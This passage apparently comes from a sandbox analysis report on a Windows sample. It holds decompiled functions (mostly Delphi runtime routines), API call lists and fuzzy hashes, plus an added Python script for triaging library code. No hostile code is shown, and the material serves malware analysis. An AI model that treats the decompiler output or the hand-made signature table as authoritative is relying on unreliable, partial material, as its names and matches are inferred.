                                                                                    										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
                                                                                    										_pop(_t339);
                                                                                    										 *[fs:eax] = _t339;
                                                                                    										_push(0x42fde5);
                                                                                    										return E00429278( &_v48);
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								E00428BF0(__ecx);
                                                                                    								goto L41;
                                                                                    							}
                                                                                    						} else {
                                                                                    							_v9 = E0042F550(_v8, 2);
                                                                                    							goto L41;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_v9 = E0042F53C(0, 1);
                                                                                    						goto L41;
                                                                                    					}
                                                                                    				} else {
                                                                                    					if(_t272 != 0) {
                                                                                    						if(_t272 != 1) {
                                                                                    							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
                                                                                    								_push( &_v12);
                                                                                    								_t282 =  *_v24;
                                                                                    								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
                                                                                    									_push( &_v48);
                                                                                    									L00427244();
                                                                                    									_push(_t360);
                                                                                    									_push(0x42fb63);
                                                                                    									_push( *[fs:eax]);
                                                                                    									 *[fs:eax] = _t363;
                                                                                    									_t306 =  *_v28 & 0x0000ffff;
                                                                                    									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
                                                                                    									if((_v48 & 0xfff) !=  *_v28) {
                                                                                    										E00428AF8(_t306);
                                                                                    									}
                                                                                    									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
                                                                                    									_pop(_t347);
                                                                                    									 *[fs:eax] = _t347;
                                                                                    									_push(0x42fde5);
                                                                                    									return E00429278( &_v48);
                                                                                    								} else {
                                                                                    									if(( *_v28 & 0x0000ffff) == _v12) {
                                                                                    										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                    										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
                                                                                    										goto L41;
                                                                                    									} else {
                                                                                    										_push( &_v48);
                                                                                    										L00427244();
                                                                                    										_push(_t360);
                                                                                    										_push(0x42facc);
                                                                                    										_push( *[fs:eax]);
                                                                                    										 *[fs:eax] = _t363;
                                                                                    										_t311 = _v12 & 0x0000ffff;
                                                                                    										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
                                                                                    										if((_v48 & 0xfff) != _v12) {
                                                                                    											E00428AF8(_t311);
                                                                                    										}
                                                                                    										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                    										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
                                                                                    										_pop(_t355);
                                                                                    										 *[fs:eax] = _t355;
                                                                                    										_push(0x42fde5);
                                                                                    										return E00429278( &_v48);
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								E00428BF0(__ecx);
                                                                                    								goto L41;
                                                                                    							}
                                                                                    						} else {
                                                                                    							_v9 = E0042F550(_v8, 0);
                                                                                    							goto L41;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_v9 = E0042F53C(1, 0);
                                                                                    						L41:
                                                                                    						return _v9 & 0x000000ff;
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x0042f9e7
                                                                                    0x0042f9f0
                                                                                    0x0042fde5
                                                                                    0x0042fded
                                                                                    0x0042fded
                                                                                    0x0042f9e5

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                    • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                                                    • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                    • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 75%
/* Delphi runtime-library code, not sample-specific logic: statement for statement this is
   SysUtils.ConvertYearString(Count), the helper FormatDateTime/DateTimeToString uses for the
   'y', 'yy' and 'yyyy' specifiers. __eax = Count (number of 'y' characters), __edx = Result
   string, _a4 = the caller's frame, whose Year/Month/Day locals sit at _a4-2, _a4-4, _a4-6.
   Helper names in the comments are inferred from the Delphi RTL source; the report does not
   resolve them. The trailing hex value on each statement is its address in the dump. */
			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;                     /* FormatStr (UnicodeString) */
				short _v18;                   /* SystemTime.wDay */
				short _v22;                   /* SystemTime.wMonth */
				struct _SYSTEMTIME _v24;      /* SystemTime; wYear is written through this name */
				short _v536;                  /* Buffer[0x100] of WideChar for GetDateFormatW */
				short* _t32;
				intOrPtr* _t47;               /* Result (from __edx) */
				intOrPtr _t56;
				void* _t61;                   /* Count (from __eax) */
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;                                                                  // 0x0041c79d
				_t47 = __edx;                                                             // 0x0041c7a0
				_t61 = __eax;                                                             // 0x0041c7a2
				_push(_t67);                                                              // 0x0041c7a6
				_push(0x41c873);                                                          // 0x0041c7a7: Delphi try..finally, push handler address
				_push( *[fs:eax]);                                                        // 0x0041c7ac: link the frame into fs:[0]
				 *[fs:eax] = _t67 + 0xfffffdec;                                           // 0x0041c7af
				E00407A20(__edx);                                                         // 0x0041c7b4: Result := '' (UStrClr)
				_v24 =  *(_a4 - 2) & 0x0000ffff;                                          // 0x0041c7c0: SystemTime.wYear := Year
				_v22 =  *(_a4 - 4) & 0x0000ffff;                                          // 0x0041c7cb: SystemTime.wMonth := Month
				_v18 =  *(_a4 - 6) & 0x0000ffff;                                          // 0x0041c7d6: SystemTime.wDay := Day
				if(_t61 > 2) {                                                            // 0x0041c7dd
					E00407E48( &_v8, L"yyyy");                                            // 0x0041c7f6: Count > 2, four-digit year
				} else {                                                                  // 0x0041c7df
					E00407E48( &_v8, 0x41c88c);                                           // 0x0041c7e7: literal at 0x41c88c not resolved by the decompiler ('yy' in the RTL source)
				}                                                                         // 0x0041c7e7
				_t32 = E004084EC(_v8);                                                    // 0x0041c80a: PChar(FormatStr)
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {  // 0x0041c823: 4 = DATE_USE_ALT_CALENDAR
					E0040858C(_t47, 0x100,  &_v536);                                      // 0x0041c832: Result := Buffer
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {                       // 0x0041c838: Count = 1 and Result[1] = '0'
						_t63 =  *_t47;                                                    // 0x0041c842
						if(_t63 != 0) {                                                   // 0x0041c846
							_t63 =  *((intOrPtr*)(_t63 - 4));                             // 0x0041c84b: Length(Result), read from the string header
						}                                                                 // 0x0041c84b
						E004088AC( *_t47, _t63 - 1, 2, _t47);                             // 0x0041c858: Result := Copy(Result, 2, Length(Result) - 1), drops the leading '0'
					}                                                                     // 0x0041c858
				}                                                                         // 0x0041c838
				_pop(_t56);                                                               // 0x0041c85f
				 *[fs:eax] = _t56;                                                        // 0x0041c862: unlink the try..finally frame
				_push(0x41c87a);                                                          // 0x0041c865
				return E00407A20( &_v8);                                                  // 0x0041c872: finally, release FormatStr
			}

                                                                                    APIs
                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                                                    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: DateFormatLocaleThread
                                                                                    • String ID: $yyyy
                                                                                    • API String ID: 3303714858-404527807
                                                                                    • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                    • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                                                    • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                    • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 85%
/* Delphi runtime-library code, not sample-specific logic: statement for statement this is
   SysUtils.ExceptionErrorMessage(ExceptObject, ExceptAddr, Buffer, Size), which renders the
   standard "Exception %s in module %s at %p." text. __eax = ExceptObject, __edx = ExceptAddr,
   __ecx = Buffer. Helper names in the comments are inferred from the Delphi RTL source; the
   report does not resolve them. The trailing hex value on each statement is its address. */
			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;                              /* Buffer */
				intOrPtr _v12;                             /* ConvertedAddress */
				char _v534;                                /* ModuleName[MAX_PATH] */
				short _v1056;                              /* Temp[MAX_PATH], full module path */
				short _v1568;                              /* Format[256], the SException resource string */
				struct _MEMORY_BASIC_INFORMATION _v1596;   /* Info */
				char _v1600;                               /* TVarRec[0..4] for the format call: each entry is (value, VType) */
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;                               /* temporary UnicodeString holding ClassName */
				intOrPtr _t55;
				signed int _t76;                           /* MsgLen */
				void* _t82;                                /* ExceptAddr */
				intOrPtr _t83;                             /* MsgPtr */
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;                            /* MsgEnd */
				intOrPtr* _t102;                           /* ExceptObject */
				void* _t105;

				_v1640 = 0;                                                                   // 0x0041ef0a
				_v8 = __ecx;                                                                  // 0x0041ef10
				_t82 = __edx;                                                                 // 0x0041ef13
				_t102 = __eax;                                                                // 0x0041ef15
				_push(_t105);                                                                 // 0x0041ef19
				_push(0x41f0a8);                                                              // 0x0041ef1a: Delphi try..finally, push handler address
				_push( *[fs:eax]);                                                            // 0x0041ef1f: link the frame into fs:[0]
				 *[fs:eax] = _t105 + 0xfffff99c;                                              // 0x0041ef22
				VirtualQuery(__edx,  &_v1596, 0x1c);                                          // 0x0041ef2f: which allocation contains the faulting address?
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {  // 0x0041ef3e: 0x1000 = MEM_COMMIT
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);                          // 0x0041ef6e: not inside a mapped module, fall back to HInstance
					_v12 = E0041EEF0(_t82);                                                   // 0x0041ef7a: ConvertedAddress := ConvertAddr(ExceptAddr)
				} else {                                                                      // 0x0041ef7f
					_v12 = _t82 - _v1596.AllocationBase;                                      // 0x0041ef85: offset of the address inside its module
				}                                                                             // 0x0041ef85
				E0041A57C( &_v534, 0x104, E00420608() + 2);                                   // 0x0041efa7: ModuleName := text after the last '\' in Temp (StrLCopy)
				_t83 = 0x41f0bc;                                                              // 0x0041efac: MsgPtr := ''
				_t100 = 0x41f0bc;                                                             // 0x0041efb1: MsgEnd := ''
				_t95 =  *0x414db8 /* 0x414e10 */;                                             // 0x0041efb8: VMT of class Exception
				if(E00405F30(_t102, _t95) != 0) {                                             // 0x0041efc5: ExceptObject is Exception
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));                             // 0x0041efcf: MsgPtr := PChar(Exception(ExceptObject).Message)
					_t76 = E00407F04(_t83);                                                   // 0x0041efd3: MsgLen := StrLen(MsgPtr)
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {              // 0x0041efda: message does not already end in '.'
						_t100 = 0x41f0c0;                                                     // 0x0041efe4: MsgEnd := '.'
					}                                                                         // 0x0041efe4
				}                                                                             // 0x0041efda
				_t55 =  *0x4ba774 /* 0x40e708 */;                                             // 0x0041eff5: resource string record of SException
				_t18 = _t55 + 4 /* 0xffec */;                                                 // 0x0041effa: its Identifier
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);                  // 0x0041f009: Format := LoadStr(SException)
				E00405BE8( *_t102,  &_v1640);                                                 // 0x0041f016: ExceptObject.ClassName
				_v1636 = _v1640;                                                              // 0x0041f021: TVarRec[0] := ClassName
				_v1632 = 0x11;                                                                // 0x0041f027: vtUnicodeString
				_v1628 =  &_v534;                                                             // 0x0041f034: TVarRec[1] := ModuleName
				_v1624 = 0xa;                                                                 // 0x0041f03a: vtPWideChar
				_v1620 = _v12;                                                                // 0x0041f044: TVarRec[2] := ConvertedAddress
				_v1616 = 5;                                                                   // 0x0041f04a: vtPointer
				_v1612 = _t83;                                                                // 0x0041f051: TVarRec[3] := MsgPtr
				_v1608 = 0xa;                                                                 // 0x0041f057: vtPWideChar
				_v1604 = _t100;                                                               // 0x0041f05e: TVarRec[4] := MsgEnd
				_v1600 = 0xa;                                                                 // 0x0041f064: vtPWideChar
				E0041A814(4,  &_v1636);                                                       // 0x0041f080: StrLFmt(Buffer, Size, Format, five args); register arguments are not shown by the decompiler
				E00407F04(_v8);                                                               // 0x0041f088: Result := StrLen(Buffer)
				_pop(_t98);                                                                   // 0x0041f091
				 *[fs:eax] = _t98;                                                            // 0x0041f094: unlink the try..finally frame
				_push(0x41f0af);                                                              // 0x0041f097
				return E00407A20( &_v1640);                                                   // 0x0041f0a7: finally, release the ClassName string
			}

                                                                                    APIs
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                    • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3990497365-0
                                                                                    • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                    • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                                                    • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                    • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
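The two decompiled functions above, E0041C790 and E0041EEFC, match call for call the Delphi runtime routines SysUtils.ConvertYearString (GetThreadLocale plus GetDateFormatW with dwFlags 4) and SysUtils.ExceptionErrorMessage (VirtualQuery, two GetModuleFileNameW calls, LoadStringW with resource id 0xFFEC). That identification is made here from their bodies; the report itself does not state it. Every Delphi binary carries the same routines, so the per-function "APIs" lists in a report like this are enough to set them aside before reading the code that is actually the sample's own. The Python below is an added example and is not code from the report or from Joe Sandbox: it parses two "APIs" blocks (copied from this page as constructed input), matches them against a small hand-written signature table, and marks everything else for review. The signature table, its routine names and the `triage` helper are this example's own assumptions; a production filter would key on the Instruction Fuzzy Hash as well, since several unrelated routines can share an import set.

```python
import re
from collections import Counter

# Constructed sample input: the two "APIs" blocks copied from this report page.
SAMPLE_BLOCKS = {
    "E0041C790": (
        "APIs\n"
        "• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816\n"
        "• GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C\n"
    ),
    "E0041EEFC": (
        "APIs\n"
        "• VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F\n"
        "• GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53\n"
        "• GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E\n"
        "• LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009\n"
    ),
}

# One "• Api.MODULE(arg,arg,...), ref: ADDR" line of a Joe Sandbox APIs block.
API_LINE = re.compile(
    r"^\s*\u2022\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_calls(block):
    """Return [(api, module, [args...], ref)] for every call line in one APIs block."""
    calls = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip().upper() for a in m["args"].split(",")] if m["args"] else []
            calls.append((m["api"], m["module"], args, m["ref"].lower()))
    return calls


# Hypothetical signature table (this example's own assumption, not from the report):
# the exact multiset of imports a routine makes plus one constant argument that
# pins it down. Both entries were derived from the decompiled bodies above.
RTL_SIGNATURES = [
    {
        "name": "SysUtils.ConvertYearString",
        "calls": {"GetThreadLocale": 1, "GetDateFormatW": 1},
        "const": ("GetDateFormatW", 1, "00000004"),   # dwFlags = DATE_USE_ALT_CALENDAR
    },
    {
        "name": "SysUtils.ExceptionErrorMessage",
        "calls": {"VirtualQuery": 1, "GetModuleFileNameW": 2, "LoadStringW": 1},
        "const": ("LoadStringW", 1, "0000FFEC"),      # uID of the SException resource string
    },
]


def classify(block):
    """Name the RTL routine an APIs block belongs to, or None if it matches nothing."""
    calls = parse_api_calls(block)
    seen = Counter(api for api, _, _, _ in calls)
    for sig in RTL_SIGNATURES:
        if seen != Counter(sig["calls"]):
            continue                      # import multiset must match exactly
        api, index, expected = sig["const"]
        if any(a == api and len(args) > index and args[index] == expected
               for a, _, args, _ in calls):
            return sig["name"]            # distinguishing constant confirms it
    return None


def triage(blocks):
    """Map each function to its RTL name, or to 'review' when it is not known library code."""
    return {name: classify(block) or "review" for name, block in blocks.items()}


if __name__ == "__main__":
    for func, verdict in triage(SAMPLE_BLOCKS).items():
        print(f"{func}: {verdict}")
```

Run stand-alone, the block labels both sample functions as RTL code; any block whose import set or distinguishing constant differs, for example a CreateRemoteThread or WriteProcessMemory call, comes back as "review", which is where analyst time belongs.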

                                                                                    C-Code - Quality: 58%
                                                                                    			E0040A6C8(signed short __eax, void* __edx) {
                                                                                    				char _v8;
                                                                                    				char _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				signed int _v20;
                                                                                    				short _v22;
                                                                                    				short _v24;
                                                                                    				char _v26;
                                                                                    				char _v32;
                                                                                    				void* __ebp;
                                                                                    				void* _t39;
                                                                                    				void* _t55;
                                                                                    				void* _t59;
                                                                                    				short* _t62;
                                                                                    				signed short _t66;
                                                                                    				void* _t67;
                                                                                    				void* _t68;
                                                                                    				signed short _t79;
                                                                                    				void* _t81;
                                                                                    
                                                                                    				_t81 = __edx;
                                                                                    				_t66 = __eax;
                                                                                    				_v16 = 0;
                                                                                    				if(__eax !=  *0x4bdc08()) {
                                                                                    					_v16 = E0040A684( &_v8);
                                                                                    					_t79 = _t66;
                                                                                    					_v20 = 3;
                                                                                    					_t62 =  &_v26;
                                                                                    					do {
                                                                                    						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
                                                                                    						_t79 = (_t79 & 0x0000ffff) >> 4;
                                                                                    						_v20 = _v20 - 1;
                                                                                    						_t62 = _t62 - 2;
                                                                                    					} while (_v20 != 0xffffffff);
                                                                                    					_v24 = 0;
                                                                                    					_v22 = 0;
                                                                                    					 *0x4bdc04(4,  &_v32,  &_v20);
                                                                                    				}
                                                                                    				_t39 = E0040A684( &_v12);
                                                                                    				_t67 = _t39;
                                                                                    				if(_t67 != 0) {
                                                                                    					_t55 = _v12 - 2;
                                                                                    					if(_t55 >= 0) {
                                                                                    						_t59 = _t55 + 1;
                                                                                    						_v20 = 0;
                                                                                    						do {
                                                                                    							if( *((short*)(_t67 + _v20 * 2)) == 0) {
                                                                                    								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
                                                                                    							}
                                                                                    							_v20 = _v20 + 1;
                                                                                    							_t59 = _t59 - 1;
                                                                                    						} while (_t59 != 0);
                                                                                    					}
                                                                                    					E00408550(_t81, _t67);
                                                                                    					_t39 = E0040540C(_t67);
                                                                                    				}
                                                                                    				if(_v16 != 0) {
                                                                                    					 *0x4bdc04(0, 0,  &_v20);
                                                                                    					_t68 = E0040A684( &_v12);
                                                                                    					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
                                                                                    						 *0x4bdc04(8, _v16,  &_v20);
                                                                                    					}
                                                                                    					E0040540C(_t68);
                                                                                    					return E0040540C(_v16);
                                                                                    				}
                                                                                    				return _t39;
                                                                                    			}

                                                                                    Disassembly address column for E0040A6C8 (instruction text not extracted): 0x0040a6d0 through 0x0040a7e1

                                                                                    APIs
                                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                                                      • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                                                      • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                                    • String ID:
                                                                                    • API String ID: 2255706666-0
                                                                                    • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                    • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                                                    • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                    • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00420BD8() {
                                                                                    				void* __ebx;
                                                                                    				struct HINSTANCE__* _t1;
                                                                                    				void* _t4;
                                                                                    
                                                                                    				_t1 = GetModuleHandleW(L"kernel32.dll");
                                                                                    				_t3 = _t1;
                                                                                    				if(_t1 != 0) {
                                                                                    					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
                                                                                    					 *0x4b7e30 = _t1;
                                                                                    				}
                                                                                    				if( *0x4b7e30 == 0) {
                                                                                    					 *0x4b7e30 = E0041A4DC;
                                                                                    					return E0041A4DC;
                                                                                    				}
                                                                                    				return _t1;
                                                                                    			}

                                                                                    Disassembly address column for E00420BD8 (instruction text not extracted): 0x00420bde through 0x00420c0d

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                    • API String ID: 1646373207-1127948838
                                                                                    • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                    • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                                                    • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                    • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6A9E
                                                                                    • GetVersion.KERNEL32(00000000,005C6C47,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6ABB
                                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C6C47,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6AD5
                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C6C47,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6AF0
                                                                                    • FreeSid.ADVAPI32(00000000,005C6C4E,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6C41
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                                                    • String ID: uk$CheckTokenMembership$advapi32.dll
                                                                                    • API String ID: 2691416632-2919004508
                                                                                    • Opcode ID: 930449ea2898bceb78295043c1ec9305660db60b0414eea0f5fbb8f5990fc05b
                                                                                    • Instruction ID: 9b09fa211300e1720079580cda0a6c70b4ecc7476fc6e1156ca500a6c4762d8e
                                                                                    • Opcode Fuzzy Hash: 930449ea2898bceb78295043c1ec9305660db60b0414eea0f5fbb8f5990fc05b
